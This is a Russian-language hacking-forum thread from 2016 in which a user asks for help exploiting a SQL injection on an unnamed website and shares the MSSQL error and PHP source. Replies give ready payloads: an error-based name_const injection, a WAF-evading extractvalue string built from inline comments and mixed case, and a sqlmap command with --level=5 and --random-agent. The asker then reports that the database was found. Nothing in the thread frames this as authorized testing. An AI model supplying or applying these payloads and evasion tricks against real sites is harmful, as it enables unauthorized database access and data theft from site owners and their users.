Форум АНТИЧАТ

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)

- - SQL /site/1' (https://forum.antichat.xyz/showthread.php?t=437042)

magichead

10.02.2016 08:22

Помогите расскрутить sql

Вид такой:

site.com/city/1'

Все перелазил ничего не нашел!

Код ошибки

1)Throwable_SQL_Exception [ 0 ]: Message: Failed to query SQL statement. Reason: Incorrect syntax near 'id' and Draft = 0'.

Код:

MODPATH/leap/classes/Base/DB/MsSQL/DataReader/Standard.php [ 48 ]



43      */

44     public function __construct(DB_Connection_Driver $connection, $sql, $mode = NULL) {

45         $resource = $connection->get_resource();

46         $command = @mssql_query($sql, $resource);

47         if ($command === FALSE) {

48             throw new Throwable_SQL_Exception('Message: Failed to query SQL statement. Reason: :reason', array(':reason' => @mssql_get_last_message()));

49         }

50         $this->command = $command;

51         $this->record = FALSE;

52     }

OxoTnik

10.02.2016 10:02

Error dased

magichead

10.02.2016 10:48

Цитата:

Сообщение от OxoTnik

↑
Error dased

это как понять?

site.com/city/1' - не могу понять как сделать правельную sql типо .php?city=1'

OxoTnik

10.02.2016 11:16

site.com/city/1'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1

magichead

10.02.2016 13:21

Цитата:

Сообщение от OxoTnik

↑
site.com/city/1
'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1

Перекидывает на 404

А можно в sqlmap какнибудь раскрутить?

MaxFast

10.02.2016 14:25

Есть ещё один прекрасный вектор, который может сработать в твоей ситуации.

Код:

site.com/city/-1+/*!aNd*/+/*!ExTRaCtVaLuE*/(1,/*!CoNcAt*/(0x3a,(version()))+--+

Местный WAF всему виной.

magichead

10.02.2016 14:47

Цитата:

Сообщение от OxoTnik

↑
site.com/city/1
'or(select*from(select(name_const(version(),1)),na me_const(version(),1))a)and(1)='1

Перекидывает на 404

А можно в sqlmap какнибудь раскрутить?

Цитата:

Сообщение от MaxFast

↑
Есть ещё один прекрасный вектор, который может сработать в твоей ситуации.

Код:

site.com/city/-1+/*!aNd*/+/*!ExTRaCtVaLuE*/(1,/*!CoNcAt*/(0x3a,(version()))+--+

Местный WAF всему виной.

(((всерано перекидывает на 404

Shubka75

10.02.2016 16:11

Цитата:

Сообщение от magichead

↑
А можно в sqlmap какнибудь раскрутить?

sqlmap.py -u "site.com/city/1*" --level=5 --random-agent

magichead

10.02.2016 21:31

Цитата:

Сообщение от Shubka75

↑
sqlmap.py -u "
site.com/city/1*
" --level=5 --random-agent

Спасибо!Расскрутил,но вот проблема с кодировкой!Пишет что база MSQL 2012,пишет что база найдена.Но в место имени выходит квадрат с четырьмя нулями.Как быть с этим?

blackbox

13.02.2016 23:20

Цитата:

Сообщение от magichead

↑
Спасибо!Расскрутил,но вот проблема с кодировкой!Пишет что база MSQL 2012,пишет что база найдена.Но в место имени выходит квадрат с четырьмя нулями.Как быть с этим?

Можно посмотреть в лог-файле sqlmap, возможно консоль не поддерживает данную кодировку (какая бы она ни была), но это только предположение.

Время: 04:38

Страница 1 из 2

Показывать 40 сообщений этой темы на одной странице